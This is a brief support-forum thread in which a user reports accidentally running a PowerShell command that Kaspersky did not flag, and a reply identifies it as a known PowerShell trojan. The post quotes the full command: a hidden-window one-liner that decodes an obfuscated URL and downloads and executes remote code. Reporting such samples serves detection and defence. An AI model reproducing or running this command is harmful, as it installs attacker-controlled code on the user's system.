Jump to content

Recommended Posts

Posted

Hello, a few minutes ago i unintended execute this code (      powershell -w hidden -c $a='aHR0cHM6Ly9kdWUuY2VudGVyL20udHh0';$b=[Convert]::FromBase64String($a);$c=[System.Text.Encoding]::UTF8.GetString($b);$d="iwr $c | iex";Invoke-Expression $d; #       ) on powershell and kaspersky doesnt recognize the virus

  • The title was changed to Kaspersky doesnt recognize the virus
Posted

the Script will be detected as Trojan.PowerShell.Agent.aln

 

  • Like 1

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now


×
×
  • Create New...